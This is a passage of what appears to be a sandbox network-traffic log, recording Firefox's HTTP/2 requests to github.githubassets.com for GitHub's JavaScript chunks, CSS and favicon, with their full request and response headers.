                          https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:59 GMT
                          etag: "0x8DD34DA5B75616C"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200071-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15473
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6073dda551ad82d228e87fa0a3fdb542eb930cce
                          content-length: 543
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:00 GMT
                          etag: "0x8DD34DA5BD03AE3"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kiad7000114-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14490
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 4a57e062b1459304adfdf6b0b40c0d736aa4df2d
                          content-length: 4066
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 06 Dec 2024 19:19:22 GMT
                          etag: "0x8DD162AE3C55516"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 3388420
                          x-served-by: cache-iad-kiad7000044-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 13, 13327
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 2c7277caf58bfcc70667c2b2abdda250b293cdea
                          content-length: 6323
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-0f4cee7579d1.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/ui_packages_query-builder-element_query-builder-element_ts-0f4cee7579d1.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:27 GMT
                          etag: "0x8DD34DA6BCA205A"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:21 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200174-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15022
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 82d7e6f51a1f5f198d0fb0ce3759c1cc229a1e18
                          content-length: 7443
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:30:55 GMT
                          etag: "0x8DD34DA5904AD36"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932136
                          x-served-by: cache-iad-kjyo7100041-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14635
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 28f6ab2b020174b5ad41a4ac8ff6c4ba335be2b6
                          content-length: 5378
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C809C95"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932136
                          x-served-by: cache-iad-kiad7000041-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14476
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 6674728af8d46ec562153ee8a4f164a62db874a0
                          content-length: 4434
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-3637d26ede66.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-app_components_search_qbsearch-input-element_ts-3637d26ede66.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:00 GMT
                          etag: "0x8DD34DA5BD8E3BF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932136
                          x-served-by: cache-iad-kiad7000088-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14624
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: dacf5c0456048e68f886f9b84ffb3d30bf9bd6d4
                          content-length: 16635
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-158b85aa02cf.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-158b85aa02cf.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C3A458B"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200061-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15226
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: ba55e5968ba952aff414a96a27aebb14ab30ade3
                          content-length: 2916
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-3c480140bb8e.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-3c480140bb8e.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C7E2E52"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932136
                          x-served-by: cache-iad-kcgs7200090-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15335
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 513cec382902b021888b1235fa95c1aaafc8fb72
                          content-length: 3163
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C80EA62"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932123
                          x-served-by: cache-iad-kjyo7100121-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 50, 3295
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a9d10b3f8d289418dd63b470e240485b798c9e28
                          content-length: 525
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Fri, 06 Dec 2024 19:19:22 GMT
                          etag: "0x8DD162AE3BAD98C"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 2366174
                          x-served-by: cache-iad-kiad7000114-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 13, 13329
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8defc5be5056ee356e0186d395451923162eab8a
                          content-length: 5020
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C8027E9"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932136
                          x-served-by: cache-iad-kjyo7100114-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 14420
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: b0cb77eda768ca708104abc002145cf011fd9405
                          content-length: 2522
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-141bb9da12c5.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-141bb9da12c5.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C7951C5"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932135
                          x-served-by: cache-iad-kcgs7200124-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: MISS, HIT
                          x-cache-hits: 0, 15341
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: da4dc3605f7dcbd83e91429f1107395b0996abf9
                          content-length: 2791
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:01 GMT
                          etag: "0x8DD34DA5C39F803"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 932131
                          x-served-by: cache-iad-kiad7000106-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 21, 8566
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 0c11d02c65ffa7984ca5f1c9a7abd372719cdedd
                          content-length: 5228
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 12 Nov 2024 00:52:32 GMT
                          etag: "0x8DD02B44AD10969"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 2429494
                          x-served-by: cache-iad-kjyo7100146-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1, 13564
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 0ed70cae617ca9f622804b0735156faa03a028d6
                          content-length: 9421
                        • flag-us
                          GET
                          https://github.githubassets.com/favicons/favicon.svg
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /favicons/favicon.svg HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: image/avif,image/webp,*/*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/
                          sec-fetch-dest: image
                          sec-fetch-mode: no-cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          content-type: image/svg+xml
                          content-md5: bYAvaN8MCaSZfP0o7q/Z/w==
                          last-modified: Wed, 14 Aug 2024 19:18:58 GMT
                          etag: "0x8DCBC95F2647EDF"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:22 GMT
                          age: 110
                          x-served-by: cache-iad-kiad7000081-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 1250203, 3
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: a63b81cb7a25c7bbc0bd5713fdcf9be97f62ce74
                          content-length: 959
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/react-code-view.ab7d8fac328c00e5e0cc.module.css
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/react-code-view.ab7d8fac328c00e5e0cc.module.css HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/css,*/*;q=0.1
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: style
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: text/css
                          last-modified: Wed, 15 Jan 2025 20:57:17 GMT
                          etag: "0x8DD35A7320E9609"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 520368
                          x-served-by: cache-iad-kiad7000033-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 45, 5316
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 818bd7acbf26a67c73c08a15324445296907bd3b
                          content-length: 1204
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Mon, 16 Sep 2024 23:19:54 GMT
                          etag: "0x8DCD6A6128E8C4A"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 3496925
                          x-served-by: cache-iad-kiad7000157-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 49, 7479
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 3026875daf8fa0a30eed40ab0de4f429e244d0e0
                          content-length: 2209
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
                          sec-fetch-dest: script
                          sec-fetch-mode: cors
                          sec-fetch-site: cross-site
                          te: trailers
                          Response
                          HTTP/2.0 200
                          cache-control: public, max-age=31536000, immutable
                          content-type: application/javascript
                          last-modified: Tue, 14 Jan 2025 20:31:31 GMT
                          etag: "0x8DD34DA6E0E2A39"
                          server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
                          content-encoding: br
                          via: 1.1 varnish, 1.1 varnish
                          accept-ranges: bytes
                          date: Mon, 27 Jan 2025 17:26:47 GMT
                          age: 932149
                          x-served-by: cache-iad-kiad7000090-IAD, cache-lcy-eglc8600053-LCY
                          x-cache: HIT, HIT
                          x-cache-hits: 37, 8249
                          vary: Accept-Encoding
                          cross-origin-resource-policy: cross-origin
                          access-control-allow-origin: *
                          strict-transport-security: max-age=31536000
                          x-fastly-request-id: 8ef70eb4c3def2840d219357b194a37abe0ca526
                          content-length: 2138
                        • flag-us
                          GET
                          https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js
                          firefox.exe
                          Remote address:
                          185.199.110.154:443
                          Request
                          GET /assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.js HTTP/2.0
                          host: github.githubassets.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: */*
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          origin: https://github.com
                          referer: https://github.com/
